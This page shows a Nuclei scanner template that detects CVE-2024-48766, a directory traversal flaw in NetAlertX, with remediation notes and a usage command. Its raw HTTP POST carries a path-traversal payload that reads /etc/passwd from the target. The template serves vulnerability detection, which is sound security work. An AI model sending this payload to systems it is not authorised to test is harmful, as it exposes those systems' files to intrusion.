Skip to content

NetAlert X - Arbitary File Read

ID: CVE-2024-48766

Severity: critical

Author: s4e-io

Tags: cve,cve2024,netalertx,lfi

A directory traversal vulnerability has been identified in NetAlertX versions v24.7.18 - v24.9.12.

id: CVE-2024-48766
info:
name: NetAlert X - Arbitary File Read
author: s4e-io
severity: critical
description: |
A directory traversal vulnerability has been identified in NetAlertX versions v24.7.18 - v24.9.12.
impact: |
This vulnerability allows remote attackers to list directories on the affected system. Successful exploitation could enable unauthorized users to explore the system’s internal structure.
remediation: |
Fixed in v24.10.12
reference:
- https://advisories.checkpoint.com/defense/advisories/public/2025/cpai-2024-1358.html
- https://github.com/rapid7/metasploit-framework/pull/19881
- https://github.com/jokob-sk/NetAlertX
metadata:
verified: true
max-request: 1
vendor: jokob-sk
product: netalertx
fofa-query: "NetAlert X"
tags: cve,cve2024,netalertx,lfi
variables:
filename: "{{rand_base(6)}}"
http:
- raw:
- |
POST /php/components/logs.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
items=[{"buttons":[{"labelStringCode":"Maint_PurgeLog","event":"logManage(app.log, cleanLog)"},{"labelStringCode":"Maint_RestartServer","event":"askRestartBackend()"}],"fileName":"{{filename}}","filePath":"../../../../..//etc/passwd","textAreaCssClass":"logs"}]
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- 'contains(body, "Purge log")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100d6141d123f24949cd043374811e347ee1db9b92dcbbbbca7e9ac5b5632014b32022060e7f7b8fdfb376ccc738f28a00ef62443afd3a9c456cb7e695d4cdc6530c066:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-48766.yaml"

View on Github